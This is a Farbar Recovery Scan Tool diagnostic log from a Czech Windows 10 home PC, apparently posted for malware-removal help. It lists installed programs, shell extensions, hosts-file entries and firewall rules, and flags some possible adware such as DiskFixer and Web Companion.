2020-09-04 20:28 - 2020-08-08 11:31 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (2)
2020-09-03 20:48 - 2020-03-20 23:40 - 000006106 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-09-02 20:13 - 2020-03-21 00:32 - 000006611 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-09-02 20:09 - 2020-03-20 23:29 - 001694640 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-02 20:09 - 2019-03-19 13:55 - 000717182 _____ C:\WINDOWS\system32\perfh005.dat
2020-09-02 20:09 - 2019-03-19 13:55 - 000145262 _____ C:\WINDOWS\system32\perfc005.dat
2020-09-02 20:09 - 2019-03-19 06:50 - 000000000 ____D C:\WINDOWS\INF
2020-09-02 20:05 - 2020-03-20 23:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-09-02 20:04 - 2020-03-20 23:49 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-09-02 20:04 - 2020-03-20 23:40 - 000089749 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-09-02 20:04 - 2020-03-20 23:40 - 000017061 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-09-02 20:04 - 2019-03-19 06:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-09-02 20:01 - 2020-03-20 23:49 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-08-29 22:38 - 2019-03-19 06:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-08-29 22:34 - 2020-03-20 23:30 - 000000000 ____D C:\Users\Milan
2020-08-29 18:15 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-08-29 18:14 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\registration
2020-08-29 17:33 - 2020-04-14 17:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Castlevania - The New Generation
2020-08-28 10:06 - 2020-06-07 10:48 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-08-28 10:06 - 2020-06-07 10:48 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-08-27 23:32 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-08-26 11:40 - 2020-03-20 23:34 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1738925715-1269715944-3180472622-1001
2020-08-26 11:40 - 2020-03-20 23:34 - 000000000 ___RD C:\Users\Milan\OneDrive
2020-08-26 11:40 - 2020-03-20 23:30 - 000002365 _____ C:\Users\Milan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-08-26 00:51 - 2020-04-11 00:56 - 000005712 _____ C:\ProgramData\DisplaySessionContainer18.log_backup1
2020-08-25 12:48 - 2020-04-09 21:49 - 000006093 _____ C:\ProgramData\DisplaySessionContainer17.log_backup1
2020-08-25 01:07 - 2020-04-08 22:17 - 000006094 _____ C:\ProgramData\DisplaySessionContainer16.log_backup1
2020-08-24 12:54 - 2020-04-07 21:57 - 000006093 _____ C:\ProgramData\DisplaySessionContainer15.log_backup1
2020-08-23 21:46 - 2020-04-06 21:57 - 000006615 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2020-08-15 14:23 - 2020-08-08 20:33 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (3)
2020-08-15 08:06 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 ___RD C:\Users\Milan\3D Objects
2020-08-12 21:39 - 2020-03-20 23:18 - 000353328 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-08-12 21:37 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\servicing

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================
a

Kód: Vybrat vše

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-09-2020
Ran by Milan (11-09-2020 14:30:53)
Running from C:\Users\Milan\Desktop
Windows 10 Home Version 1909 18363.1016 (X64) (2020-03-20 21:25:00)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1738925715-1269715944-3180472622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1738925715-1269715944-3180472622-503 - Limited - Disabled)
Guest (S-1-5-21-1738925715-1269715944-3180472622-501 - Limited - Disabled)
Milan (S-1-5-21-1738925715-1269715944-3180472622-1001 - Administrator - Enabled) => C:\Users\Milan
WDAGUtilityAccount (S-1-5-21-1738925715-1269715944-3180472622-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.0.7 - philandro Software GmbH)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.6.3135 - AVG Technologies)
AVG Secure Browser (HKLM-x32\...\AVG Secure Browser) (Version: 85.0.5675.85 - Autoři prohlížeče AVG Secure Browser)
AVG Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1066.0 - AVG Technologies) Hidden
Car Mechanic Simulator 2018 Mercedes Benz (HKLM-x32\...\Car Mechanic Simulator 2018 Mercedes Benz_is1) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 5.4.1.0928 - Disc Soft Ltd)
Dark Konflict (HKLM-x32\...\Dark Konflict) (Version:  - )
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
DiskFixer version 1.0 (HKLM-x32\...\DiskFixer_is1) (Version: 1.0 - MyAppsLand) <==== ATTENTION
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{D2D9559D-359A-4C61-B93A-FE01AE2BFB75}) (Version: 4.5.4 - Seiko Epson Corporation)
EpsonNet Print (HKLM\...\{96ED1D58-440C-4345-8FEE-C4781366C67F}) (Version: 3.1.4.0 - SEIKO EPSON Corporation)
Euro Truck Simulator 2 v1.35.3.4S (HKLM-x32\...\tuttop.com Euro Truck Simulator 2 v1.35.3.4S_is1) (Version: 1.35.3.4S - tuttop.com)
HELLGATE London (HKLM-x32\...\HELLGATE London_is1) (Version:  - )
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.51 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mockba to Berlin (HKLM-x32\...\{BCECC8FA-31AD-487A-A8C4-1C9C5454F9C6}_is1) (Version: 2.17 - US - ACTION, s.r.o.)
Mozilla Firefox 80.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 80.0.1 (x64 cs)) (Version: 80.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 69.0 - Mozilla)
NVIDIA Ovladače grafiky 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}) (Version: 9.10.0514 - NVIDIA Corporation)
Odinstalace tiskárny EPSON L3150 Series (HKLM\...\EPSON L3150 Series) (Version:  - Seiko Epson Corporation)
Original War (HKLM-x32\...\Original War) (Version:  - )
Příručky společnosti EPSON (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.56.1.0 - Seiko Epson Corporation)
S.T.A.L.K.E.R. Clear Sky (HKLM-x32\...\GOGPACKSTALKERSTCS_is1) (Version: 2.0.0.8 - GOG.com)
Siegecraft Commander (HKLM-x32\...\Siegecraft Commander_is1) (Version:  - )
Skype verze 8.64 (HKLM-x32\...\Skype_is1) (Version: 8.64 - Skype Technologies S.A.)
Sniper Elite (HKLM-x32\...\{2527736B-927C-4E5F-A861-6BA616568B80}_is1) (Version: 1.0 - US - ACTION, s.r.o.)
Sorades - Die Befreiung (HKLM-x32\...\Sorades - Die Befreiung) (Version: 1.0 - diebefreiung.de)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spintires Chernobyl (HKLM-x32\...\Spintires Chernobyl_is1) (Version:  - )
Splitter 9.6.0.1 (HKLM-x32\...\WAV MP3 Splitter_is1) (Version: 9.6.0.1 - Piston Software)
Surviving Mars (HKLM-x32\...\Surviving Mars_is1) (Version:  - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.5.0 - TeamSpeak Systems GmbH)
The Colonists (HKLM-x32\...\1282350952_is1) (Version: V1 - GOG.com)
The Sinking City (HKLM-x32\...\The Sinking City_is1) (Version: 0.0.0 - THE KNIGHT)
The Subject (HKLM-x32\...\The Subject_is1) (Version:  - )
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Train Valley 2 Passenger Flow (HKLM-x32\...\Train Valley 2 Passenger Flow_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
Web Companion (HKLM-x32\...\{a99f66ff-7dd7-4937-89c9-70b6d9568932}) (Version: 6.0.2270.4122 - Lavasoft)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.12.4.0_x86__kgqvnymyfvs32 [2020-08-29] (king.com)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Studios) [MS Ad]
MSN Počasí -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-08-29] (NVIDIA Corp.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveUltra] -> {F0E53CA3-02F8-40AE-9470-309F0309036F} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers3: [DaemonShellExtImageUltra] -> {B5EBA666-2B94-4C7A-9CAA-A4539F329646} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\nvshext.dll [2019-10-04] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2020-03-21 10:40 - 2020-09-08 18:46 - 002072064 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 000310784 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 006903808 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2020-08-15 08:36 - 2020-08-15 08:36 - 003230720 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DotNetCommon\1ff547e9235b59188e9fe052625211ac\DotNetCommon.ni.dll
2018-11-29 14:21 - 2018-12-18 09:48 - 006142320 _____ (AVB Disc Soft, SIA -> Disc Soft Ltd) [File not signed] C:\Program Files\DAEMON Tools Ultra\engine.dll
2020-08-15 08:35 - 2020-08-15 08:35 - 004807680 _____ (Disc Soft Ltd) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DiscSoft.NET.Common\5eaf8b2270226ec230b3f2ddb6c2aeb0\DiscSoft.NET.Common.ni.dll
2015-12-11 16:14 - 2015-12-11 16:14 - 004968448 _____ (Seiko Epson Corporation) [File not signed] C:\Program Files\EpsonNet\EpsonNet Print\ENSTRMAPIe.dll
2016-09-14 14:31 - 2016-09-14 14:31 - 000500736 ____S (SEIKO EPSON CORPORATION) [File not signed] C:\WINDOWS\System32\enppmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2019-03-19 06:49 - 2020-08-29 17:29 - 000001032 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 ultramediaburner.com
127.0.0.1 pro-zipper.com
127.0.0.1 productsdetails.online
127.0.0.1 post-back-url.com
127.0.0.1 rothsideadome.pw
127.0.0.1 room1.360dev.info
127.0.0.1 telechargini.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Milan\AppData\Roaming\Microsoft\Windows Photo Viewer\Tapeta programu Windows Prohlížeč fotografií.jpg
DNS Servers: 213.46.172.37 - 213.46.172.36
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AF110A0F-4670-4C4D-BEE8-E19734C4583D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9C06B5BB-EDC4-4D95-B199-0729186F7C06}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{35FE486C-13A8-4115-91BE-EADD94521488}] => (Allow) C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe (AVB Disc Soft, SIA -> Disc Soft Ltd)
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [{262D1130-0562-4ABD-9DBE-BD7A36B75E21}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D223F931-EC0B-418D-9CA1-86DED4F80FF0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{9B85BCFD-5637-46EF-A544-F5CDD031E56D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{25501F14-C7E3-49B5-8AA0-F411A214A2BB}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{A3EBED2B-E21A-49AB-BEA3-6FB81621A465}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [UDP Query User{B51E31E2-FC04-4595-B7AB-A56857E725E5}E:\hry\stronghold 2\stronghold2.exe] => (Allow) E:\hry\stronghold 2\stronghold2.exe (Firefly Studios) [File not signed]
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{90FE4625-EC42-45BC-B81D-AEBFAAEB3605}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [UDP Query User{F492EFD5-2DD1-4CEE-A197-77B815F15539}E:\games\biped\biped.exe] => (Allow) E:\games\biped\biped.exe => No File
FirewallRules: [{21A57DD2-2491-485C-BF53-169D9F586B7F}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [{50B518EB-89DF-4A79-BFA8-A6CFCEE55F17}] => (Allow) C:\Users\Milan\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => No File
FirewallRules: [TCP Query User{C6DD6FA6-D002-472C-8DC9-FD005438CE0E}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe
FirewallRules: [UDP Query User{F44B8E13-1BA1-46B6-9654-F1C31E009A03}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe
FirewallRules: [TCP Query User{FA9AB6ED-0A91-4065-8E02-AB57F96CA02A}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [UDP Query User{F35B841D-2C85-46D4-9B66-2CC2D1A4A33D}E:\hry\foundation\foundation.exe] => (Allow) E:\hry\foundation\foundation.exe (Polymorph Games) [File not signed]
FirewallRules: [TCP Query User{47D6DBFB-0BBF-4425-8906-78FA4190532B}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [UDP Query User{D5D966E3-E806-4944-8A51-2B58DF1551EE}E:\games\surviving mars\marssteam.exe] => (Allow) E:\games\surviving mars\marssteam.exe (Haemimont Games AD -> Haemimont Games)
FirewallRules: [{0A47C543-177F-4283-B753-89601E79F3E0}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{6608746E-BB0D-4940-80AE-71255BADFC02}] => (Allow) C:\Program Files (x86)\AnyDesk\AnyDesk.exe (philandro Software GmbH -> philandro Software GmbH)
FirewallRules: [{E95688B6-E055-4354-9794-DC2A141C37A9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9C304D1E-B5CB-412A-AF72-2E84EE6DCDF1}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A50B23FA-CD55-4336-AD45-9DE5FF6B2823}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{9D976B0F-3F56-4B50-9E8E-0DA017F266E9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{325BD370-A36E-489E-A599-AB133BADB490}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{2A891082-BCF5-4CD4-82EF-E3EF4198782E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{894A84BA-5FED-41DC-9186-4EC56F14C63B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{5BF0B819-43B4-4FF6-9491-0C2B932F5D11}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{B74BA9EF-DF6C-486F-838D-27C253A82114}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{C7EB689E-FBBC-4034-A5E3-A156344389B6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{64E294F8-B0A6-432A-84E0-9AFEF4391F5E}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{F2F85B56-CBE0-46DB-989F-B9836244F9B8}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0\Spotify.exe => No File
FirewallRules: [{53DB185F-AC50-407C-8DBC-868D5480C1B9}] => (Allow) C:\Users\Milan\AppData\Roaming\0246cded558e\0246cded558e.exe => No File
